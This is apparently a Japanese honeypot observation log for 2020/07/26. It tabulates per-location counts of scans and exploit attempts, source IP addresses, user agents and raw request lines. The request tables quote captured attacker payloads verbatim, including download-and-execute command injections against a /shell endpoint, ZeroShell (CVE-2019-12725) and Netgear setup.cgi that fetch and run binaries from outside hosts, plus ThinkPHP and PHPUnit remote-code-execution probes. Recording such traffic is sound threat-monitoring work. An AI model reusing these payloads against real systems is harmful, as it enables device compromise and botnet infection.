ハニーポット(仮) 観測記録 2020/07/26分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
163[.]172[.]88[.]110によるスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.132.53.42/beastmode/b3astmode; chmod 777 /tmp/b3astmode; sh /tmp/b3astmode BeastMode.Rep.Jaws
Location:US
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
163[.]172[.]88[.]110によるスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.132.53.42/beastmode/b3astmode; chmod 777 /tmp/b3astmode; sh /tmp/b3astmode BeastMode.Rep.Jaws
Location:UK
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
163[.]172[.]88[.]110によるスキャン行為
を確認しました。
Location:SG
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:25 (前日比:-42)
US:総アクセス数:33 (前日比:0)
UK:総アクセス数:40 (前日比:-353)
SG:総アクセス数:22 (前日比:-19)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 41.235.119.10 | Egypt |
| 2 | 47.100.201.52 | China |
| 1 | 51.103.53.65 | United Kingdom |
| 1 | 61.219.11.153 | Taiwan |
| 4 | 89.248.167.131 | Netherlands |
| 6 | 91.199.118.137 | Germany |
| 1 | 93.174.93.139 | Netherlands |
| 3 | 95.211.230.211 | Netherlands |
| 1 | 102.45.166.48 | Egypt |
| 1 | 128.199.208.2 | United Kingdom |
| 1 | 162.243.128.9 | United States |
| 2 | 185.39.11.105 | Switzerland |
| 1 | 207.102.21.5 | Canada |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 9 | Go-http-client/1.1 |
| 2 | Hello, world |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| 2 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | XTC |
| 1 | python-requests/2.10.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | \x17\x03\x01\x01\x04e | ||
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.42/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /v2/_catalog | HTTP/1.1 |
| 3 | GET | http[:]//163[.]172[.]88[.]110:41298/1 | HTTP/1.1 |
| 3 | GET | http[:]//163[.]172[.]88[.]110:41298/pass | HTTP/1.1 |
| 1 | GET | http[:]//www[.]google[.]com/ | HTTP/1.0 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 6 | 91.199.118.137 | Germany |
| 2 | 93.174.93.139 | Netherlands |
| 1 | 102.43.169.41 | Egypt |
| 10 | 117.50.137.21 | China |
| 10 | 125.124.63.19 | China |
| 1 | 162.243.129.158 | United States |
| 2 | 185.39.11.105 | Switzerland |
| 1 | 193.27.228.170 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | Go-http-client/1.1 |
| 1 | Hello, world |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0 |
| 18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 2 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /_layouts/15/Picker.aspx | HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /elrekt.php | HTTP/1.1 |
| 2 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 2 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 2 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.42/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws | HTTP/1.1 |
| 2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 3 | GET | http[:]//163[.]172[.]88[.]110:41298/1 | HTTP/1.1 |
| 3 | GET | http[:]//163[.]172[.]88[.]110:41298/pass | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 2 | POST | /index.php?s=captcha | HTTP/1.1 |
| 1 | POST | /tools.cgi | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 6 | 40.121.90.202 | United States |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 64.227.92.17 | United States |
| 6 | 69.167.156.133 | United States |
| 6 | 91.199.118.137 | Germany |
| 1 | 91.234.62.165 | Russia |
| 1 | 93.174.93.139 | Netherlands |
| 6 | 143.92.32.86 | Singapore |
| 2 | 185.39.11.105 | Switzerland |
| 1 | 192.241.235.159 | United States |
| 7 | 195.54.160.21 | Russia |
| 1 | 218.211.168.178 | Taiwan |
| 1 | 222.186.61.115 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 22 | - |
| 7 | Go-http-client/1.1 |
| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | \x17\x03\x01\x01\x04e | ||
| 1 | \xe9\xa7\xb6\xa7*[\x8fFI\xd8\x1b_\xad\xf8\xa0\x7f+>\xf8\x14\v\x1a\xba\x14\xb1\x96{\xbf\x07C\xc9\x1d | ||
| 2 | CONNECT | g[.]alicdn[.]com/:443 | HTTP/1.1 |
| 2 | CONNECT | httpbin[.]org/:443 | HTTP/1.1 |
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 2 | CONNECT | sm[.]bdimg[.]com/:443 | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 12 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
| 1 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 3 | GET | http[:]//163[.]172[.]88[.]110:41298/1 | HTTP/1.1 |
| 3 | GET | http[:]//163[.]172[.]88[.]110:41298/pass | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 45.141.84.124 | Russia |
| 3 | 47.197.212.106 | United States |
| 1 | 59.126.166.117 | Taiwan |
| 1 | 93.174.93.139 | Netherlands |
| 1 | 103.220.38.13 | India |
| 1 | 165.227.87.106 | United States |
| 2 | 185.39.11.105 | Switzerland |
| 1 | 192.241.238.97 | United States |
| 4 | 193.37.255.114 | Romania |
| 7 | 195.54.160.21 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 9 | - |
| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729) |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.23.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | - | ||
| 1 | \x03 | ||
| 1 | \x17\x03\x01\x01\x04e | ||
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /admin/login.asp | HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | http[:]//httpheader[.]net/azenv.php | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
